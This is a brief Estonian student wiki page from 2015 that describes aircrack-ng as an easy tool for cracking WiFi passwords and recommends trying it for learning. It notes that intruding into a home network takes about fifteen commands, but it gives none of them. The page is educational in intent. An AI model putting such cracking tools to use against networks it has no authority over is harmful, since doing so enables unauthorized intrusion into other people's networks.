aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

Kasutatud kirjandus

Autor

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

Versioonide ajalugu

Kuupäev Versioon
25.05.2015 1.0